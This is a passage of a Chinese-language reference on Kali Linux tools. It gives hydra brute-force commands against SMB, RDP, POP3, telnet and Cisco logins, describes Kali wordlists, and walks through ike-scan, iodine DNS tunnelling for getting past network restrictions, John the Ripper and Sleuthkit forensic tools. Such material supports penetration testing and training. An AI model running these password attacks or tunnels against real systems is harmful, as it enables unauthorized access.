2
3

破解smb：
 
hydra -l 用户名字典 -P 密码字典 IP地址 smb

Windows远程桌面

1
2
3

破解rdp(windows远程登录)：
 
hydra ip地址 rdp -l administrator -P 密码字典.txt -V

邮箱pop3

1
2
3

破解邮箱pop3：
 
hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3

telnet破解

1

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V

语音通讯工具teamspeak

1

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak

cisco

1
2

hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable

四、Kali自带密码字典

暴力破解能成功最重要的条件还是要有一个强大的密码字典！Kali默认自带了一些字典，在 /usr/share/wordlists 目录下

dirb

1
2
3
4
5
6
7
8
9
10
11
12

big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录，默认用户名等
stress #压力测试
vulns #漏洞测试

dirbuster

1
2
3

apache-user-enum-** #apache用户枚举
directories.jbrofuzz #目录枚举
directory-list-1.0.txt #目录列表大，中，小 big，medium，small

fern-wifi

1

common.txt #公共wifi账户密码

metasploit

metasploit下有各种类型的字典

wfuzz

模糊测试，各种字典

hydra-gtk

hydra开代理进行网页加密破解等

i

icat-sleuthkit

用于恢复文件

ifind

描述:

查找已分配给定磁盘单元或文件名的元数据结构。
  ifind查找具有data_unit分配了数据单元或具有给定文件名的元数据结构。 在某些情况下，任何结构都可以取消分配，这仍然可以找到结果。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

有几个必需和可选参数。 必须每次指定图像文件名：
image [images]	
	要读取的磁盘或分区映像，其格式以“ -i”给出。 如果将图像分为多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则会自动包含后续的图像段。
您还必须指定要查找的内容，并包括以下内容之一：
	-d data _unit
		查找已分配给定数据单元（块，集群等）的元数据结构。

	-n file
		查找给定文件名指向的元数据结构。

	-p par_inode
		在NTFS映像中查找以给定inode为父节点的未分配MFT条目。 可以与-l和-z一起使用。

还有几个可选参数:
	-a
		查找所有元数据结构（仅在使用data_unit查找时有效）。

	-f fstype
		指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

	-l
		列出使用“ -p”找到的每个文件的详细信息，例如“ fls -l”。

	-i imgtype
		标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

	-b dev_sector_size
		基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

	-v
		详细输出到stderr。

	-V
		显示版本信息

	-z ZONE
		如果给出'-p -l'，这将为正确的时间设置时区。

也是读取磁盘文件的软件

ike-scan

简介

ike-scan可以发现IKE主机，也可以使用重传回退模式对它们进行指纹识别。

ike-scan可以执行以下功能：

1
2
3
4
5

•发现确定给定IP范围内的哪些主机正在运行IKE。通过显示那些响应ike-scan发送的IKE请求的主机来完成此操作。
•指纹确定主机正在使用哪种IKE实施，并在某些情况下确定主机正在运行的软件的版本。这是通过两种方式完成的：首先是UDP退避指纹识别，它包括记录来自目标主机的IKE响应数据包的时间，并将观察到的重传退避模式与已知模式进行比较；其次是供应商ID指纹识别，该指纹将VPN服务器中的供应商ID负载与已知的供应商ID模式进行比较。
•转换枚举查找IKE阶段1的VPN服务器支持哪些转换属性（例如，加密算法，哈希算法等）。
•用户枚举对于某些VPN系统，请发现有效的VPN用户名。
•预共享密钥破解通过预共享密钥身份验证为IKE积极模式执行脱机字典或暴力破解密码。它使用ike-scan来获取哈希值和其他参数，并使用psk-crack（这是ike-scan软件包的一部分）来执行破解。

重传回退指纹识别概念在UDP退回指纹识别纸中进行了更详细的讨论，该文件应作为UDP退回指纹识别纸包含在ike-scan套件中。

该程序将IKE阶段1（主模式或攻击模式）请求发送到指定的主机，并显示收到的所有响应。它处理带有重发的重试和重传以应对数据包丢失。它还限制了出站IKE数据包使用的带宽量。

IKE是Internet密钥交换协议，它是IPsec使用的密钥交换和身份验证机制。几乎所有现代VPN系统都实现IPsec，并且绝大多数IPsec VPN使用IKE进行密钥交换。主模式是为IKE交换的第1阶段定义的模式之一（另一种定义的模式是攻击模式）。RFC 2409第5节指定必须实现主模式，因此可以预期所有IKE实现都支持主模式。

使用方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

ike-scan [选项] [主机地址...]

--help或-h显示此使用信息并退出。

 --file = <fn>或-f <fn>从指定的文件中读取主机名或地址而不是从命令行。一个名字或IP每行地址对标准输入使用“ - ”。

 --sport = <p>或-s <p>将UDP源端口设置为<p>，default = 500，0 = random。

    一些IKE实现需要客户端使用UDP源端口500，不会与其他端口通话。请注意，通常需要超级用户权限使用低于1024的非零源端口系统上的一个进程可以绑定到给定的源端口，在任何一个时间使用--nat-t选项更改，默认源端口为4500

 --dport = <p>或-d <p>将UDP目标端口设置为<p>，default = 500。

    UDP端口500是ISAKMP的分配的端口号，这是大多数（如果不是全部）IKE使用的端口实现。使用--nat-t选项更改，默认目标端口为4500

 --retry = <n>或-r <n>将每个主机的总尝试次数设置为<n>，默认= 3。

 --timeout = <n>或-t <n>将每个主机超时的初始设置设置为<n> ms，默认= 500。

    此超时是发送到每个主机的第一个数据包。随后的超时乘以回退系数设置为--backoff。

 --bandwidth = <n>或-B <n>将所需的出站带宽设置为<n>，默认= 56000

    默认值为每秒位数。如果你将“K”附加到值，则单位是千比特每秒;如果你附“M”值，单位是兆比特每秒。“K”和“M”后缀代表十进制，而不是二进制，倍数。

    所以64K是64000，而不是65536。

 --interval = <n>或-i <n>将最小数据包间隔设置为<n> ms。

 分组间隔将不小于此数。指定的时间间隔默认为毫秒。如果“u”附加到该值，则间隔是微秒，如果附加了“s”间隔是秒。如果你想要使用一个给定的带宽，那就是更容易使用--bandwidth选项。您不能同时指--interval和--bandwidth，因为他们只是改变的不同方法相同的底层变量。

 --backoff = <b>或-b <b>将超时退避因子设置为<b>，默认= 1.50。

 每个主机的超时乘以这个因素每次超时后所以，如果重试的次数是3，初始的每个主机超时是500ms和退货因子是1.5，那么第一个超时就是500ms，第二个750ms和第三个1125ms。

 --verbose或-v显示详细的进度消息
  使用多次以获得更大的效果：

    1 - 显示每个通行证何时完成收到包含无效Cookie的数据包。

    2 - 显示发送和接收的每个数据包主机从列表中删除。

    3 - 显示主机，供应商ID和退货清单扫描开始之前。X-45454545 CEEC X-这样打印出较少的协议信息输出线较短。

 - multiline或-M分割多行的有效载荷解码。

 --lifetime = <s>或-l <s>将IKE生存期设置为秒，默认= 28800。

  --lifesize = <s>或-z <s>将IKE生活设置为千字节，默认= 0。

 --auth = <n>或-m <n>设置身份验证。方法为<n>，default = 1（PSK）。

    RFC定义的值为1到5.请参见RFC 2409附录A.检查点混合模式为64221。GSS（Windows“Kerberos”）为65001。XAUTH使用65001到65010。这不适用于IKEv2。

 --version或-V显示程序版本并退出。

 --vendor = <v>或-e <v>将供应商ID字符串设置为十六进制值<v>。 

主机输入和内存要求

可以在命令行上指定要扫描的主机，也可以使用该--file=<fn>选项从输入文件中读取。该程序可以处理大量主机，而这些主机仅受存储host_entry结构列表所需的内存量限制。在32位系统上，每个host_entry结构都需要45字节，因此B类网络（65534台主机）将需要大约2.8 MB的列表空间。可以将主机指定为IP地址或主机名，但是该程序会将所有主机内部存储为IP地址，并且只会在输出中显示IP地址（ike-scan调用gethostbyname（3）以确定每个主机的IP地址，但这可以通过--nodns选项禁用）。

限速

该程序限制了它发送IKE数据包的速率，以确保它不会使网络连接过载。默认情况下，它使用每秒56000位的出站数据速率。可以使用该--bandwidth选项进行更改。

如果要以特定速率发送数据包，则可以使用该--interval选项。

Cookie生成和远程主机识别

ike-scan为每个主机生成唯一的IKE cookie，并使用这些cookie来确定响应数据包属于哪个主机。请注意，它不依赖于响应数据包的源IP地址，因为响应数据包可能是从与原始发送地址不同的IP地址发送的。有关此示例，请参见“程序输出”部分。

通过获取gettimeofday（）返回的当前时间的MD5哈希值的前64位（以秒和微秒为单位），唯一的主机号和主机IP地址来生成cookie。这样可以确保cookie具有合理确定性的唯一性。

如果--verbose有效，则收到的任何与cookie不匹配的数据包都将产生如下消息：

1

Ignoring 84 bytes from 172.16.2.2 with unknown cookie 195c837e5a39f657

如果--verbose未生效，则将忽略这些数据包。

此类Cookie不匹配的原因可能是：

• 主机仍在向先前的ike-scan运行返回IKE响应。
• 该数据包不是IKE数据包，或已以某种方式损坏。要么
• 已收到与ike-scan无关的IKE数据包。

例子

以下示例将对单个主机172.16.2.2运行IKE检测。不会进行退避指纹识别，并且所有选项（超时，重试，变换集等）将是默认选项。

• ```
  ike-scan 172.16.2.2

  1 2 3 4 5

  这将从文件“ hostlist.txt”中读取目标主机。 - ``` ike-scan --file=hostlist.txt

这将从标准输入中读取主机，并执行IKE检测和退避指纹识别。退避等待时间指定为20秒。

• ```
  cat hostlist.txt | ike-scan –file=- –showbackoff=20

  1 2 3 4 5

  这将对172.16.0.0/16指定的网络中的所有主机（包括网络和广播地址）运行ike-scan。在这种情况下，这将导致总共扫描65536台主机-从172.16.0.0到172.16.255.255（含）。 - ``` ike-scan 172.16.0.0/16

这使用范围表示法来扫描从172.16.0.0到172.16.255.255（含）之间的总共65536台主机。

• ```
  ike-scan 172.16.0.0-172.16.255.255

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  ## ils-sleuthkit(未知) ## img_cat ### 描述： 输出图像文件的内容。   img_cat输出图像文件的内容。 非原始图像文件将具有嵌入的数据和[元数据](https://so.csdn.net/so/search?q=元数据&spm=1001.2101.3001.7020)。 img_cat将仅输出数据。 这使您可以将嵌入格式转换为原始格式，或者通过将输出传递到适当的工具来计算数据的MD5哈希值。 ### 参数： ```bash -i imgtype 标识图像文件的类型，例如raw或aff。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。 -b dev_sector_size 基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。 -s start_sector 起始的扇区号。 -e stop_sector 要停止的扇区号。 -v 将调试语句的详细输出输出到stderr -V 显示版本信息 image [images] 要读取的磁盘或分区映像，其格式以“ -i”给出。 如果将图像分为多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则会自动包含后续的图像段。

img_stat

描述：

 显示图像文件的详细信息。
  img_stat显示与图像文件关联的详细信息。 此命令的输出特定于图像格式。 对于分割图像格式，将至少给出大小，并给出每个文件的字节范围。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-t
	仅打印图像类型。

-v
	将调试语句的详细输出输出到stderr

-V
	显示版本信息

image [images]
	要读取的磁盘或分区映像，其格式以“ -i”给出。 如果将图像分为多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则会自动包含后续的图像段。

img开头的都是扫磁盘的

iodine

在受限制的网络中，如果DNS请求没有被限制，就可以通过DNS请求建立隧道而突破网络限制。iodine是Kali Linux提供的一款DNS隧道工具。该工具分为服务器端iodined和客户端iodine。服务器端iodined提供特定域名的DNS解析服务。当客户端请求该域名的解析，就可以建立隧道连接。该工具不仅可以提供高性能的网络隧道，还能提供额外的安全保证。渗透测试人员可以设置服务的访问密码，来保证该服务不被滥用。

优点

• 对下行数据不进行编码，因此性能优
• 支持多平台：Linux、BSD、Mac OS、Windows
• 最大16个并发链接
• 强制密码支持
• 支持同网段隧道IP（不同于服务器、客户端网段）
• 支持多种 DNS 记录类型
• 丰富的隧道质量检测措施

防火墙：m0n0wall

桥接模式
IP：192.168.1.10

DNS服务器：win2003

桥接模式
IP：192.168.1.124

本地DNS服务器：LAN_DNS

hostonly:1.1.1.111

服务器：kali

1
2
3
4
5
6

iodined -f -c 10.0.0.1 test.lab.com
#-f：前段显示（可选）
#-c：检查客户端地址（可选）
#IP：服务器端的隧道IP地址（不同于服务器主机IP和客户端主机IP，此IP仅用于隧道之间，在隧道的两道构成独立的网段）
Enter password:pass123 #设置隧道密码
ifconfig #发现多了一块网卡（新建的虚拟网卡，隧道独立使用的网段）

客户端：ubantu

1
2
3
4
5
6

iodine -f 10.0.0.2 test.lab.com
#IP：局域网内部本地DNS服务器IP（可以不设置让他自己找）
Enter password: pass123 ##设置隧道密码
ifconfig #发现多了一块网卡（新建的虚拟网卡，隧道独立使用的网段）
#嵌套隧道
ssh -fgCN -D 7001 root@10.0.0.1

istat

描述：

  显示元数据结构的详细信息（即inode）。
  istat显示uid，gid，模式，大小，链接号，修改，访问，更改的时间以及结构已分配的所有磁盘单元。

选项如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

-B num
	显示num个磁盘单元的地址。 在未分配大小为0的inode但仍具有块指针时很有用。

-f fstype
	指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-s seconds
	原始系统的时间偏差（以秒为单位）。 例如，如果原始系统的速度慢了100秒，则该值为-100。

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-v
	将调试语句的详细输出输出到stderr

-V
	显示版本号

-z zone
	原始系统时区的ASCII字符串。 例如，EST5EDT或GMT。 这些字符串由操作系统定义，并且可能会有所不同。 注意：自TCTUTILs以来，这种情况已更改。

image [images]
	要读取的磁盘或分区映像，其格式以“ -i”给出。 如果将图像分为多个段，则可以指定多个图像文件名。 如果仅给出一个图像文件，并且其名称是序列中的第一个文件（例如，以'.001'结尾的指示），则后续的图像段将自动包含在内。索引节点元数据编号以显示统计信息。

j

jcat

描述：

在文件系统日志中显示块的内容。
  jcat显示文件系统日志中日志块的内容。可以指定日志的inode地址或使用默认位置。 请注意，块地址是日记块地址，而不是文件系统块。 原始输出提供给STDOUT。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

-f fstype
	指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-i imgtype
	标识图像文件的类型，例如原始文件。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-V
	显示版本信息

-v
	详细输出

image [images]
	要读取的磁盘或分区映像，其格式以“ -i”给出。 如果图像是分为多个部分。 如果仅给出一个图像文件，并且其名称是序列中的第一个图像文件（例如，以'.001'结尾的文件），则后续的图像段将自动包含在内。

[inode]
	可以在其中找到文件系统日志的索引节点。

jblk
	要显示的日志块。

jls

描述：

列出文件系统日志的内容。
  jls列出文件系统日志中的记录和条目。 如果给出了inode，则它将在那里查找日志。 否则，它将使用默认位置。 输出列出了日记帐编号和描述。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

-f fstype
	指定文件系统类型。 使用“ -f列表”列出支持的文件系统类型。 如果未给出，则使用自动检测方法。

-i imgtype
	标识图像文件的类型，例如原始或拆分。 使用“ -i列表”列出支持的类型。 如果未给出，则使用自动检测方法。

-o imgoffset
	文件系统在映像中开始的扇区偏移量。

-b dev_sector_size
	基础设备扇区的大小（以字节为单位）。 如果未给出，则使用图像格式的值（如果存在）或假定为512字节。

-V
	显示版本信息

-v
	详细输出

image [images]
	一个（或多个，如果已拆分）磁盘或分区映像，其格式以“ -i”给出。

[inode]
	可以在其中找到文件系统日志的索引节点。

john

描述：

John the Ripper 是一款大受欢迎的、免费的开源软件。也是一个基于字典的快速破解密码的工具，是一款用于在已知密文的情况下尝试破解出明文的破解密码软件，支持目前大多数的加密算法，如 DES 、 MD4 、 MD5 等。 John the Ripper 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构，包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ，主要目的是破解不够牢固的 Unix/Linux 系统密码。

参数：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

选 项

描 述

--single

single crack 模式，使用配置文件中的规则进行破解

--wordlist=FILE--stdin

字典模式，从 FILE 或标准输入中读取词汇

--rules

打开字典模式的词汇表切分规则

--incremental[=MODE]

使用增量模式

--external=MODE

打开外部模式或单词过滤，使用 [List.External:MODE] 节中定义的外部函数

--stdout[=LENGTH]

不进行破解，仅仅把生成的、要测试是否为口令的词汇输出到标准输出上

--restore[=NAME]

恢复被中断的破解过程，从指定文件或默认为 $JOHN/john.rec 的文件中读取破解过程的状态信息

--session=NAME

将新的破解会话命名为 NAME ，该选项用于会话中断恢复和同时运行多个破解实例的情况

--status[=NAME]

显示会话状态

--make-charset=FILE

生成一个字符集文件，覆盖 FILE 文件，用于增量模式

--show

显示已破解口令

--test

进行基准测试

--users=[-]LOGIN|UID[,..]

选择指定的一个或多个账户进行破解或其他操作，列表前的减号表示反向操作，说明对列出账户之外的账户进行破解或其他操作

--groups=[-]GID[,..]

对指定用户组的账户进行破解，减号表示反向操作，说明对列出组之外的账户进行破解。

--shells=[-]SHELL[,..]

对使用指定 shell 的账户进行操作，减号表示反向操作

--salts=[-]COUNT

至少对 COUNT 口令加载加盐，减号表示反向操作

--format=NAME

指定密文格式名称，为 DES/BSDI/MD5/BF/AFS/LM 之一

--save-memory=LEVEL

设置内存节省模式，当内存不多时选用这个选项。 LEVEL 取值在 1~3 之间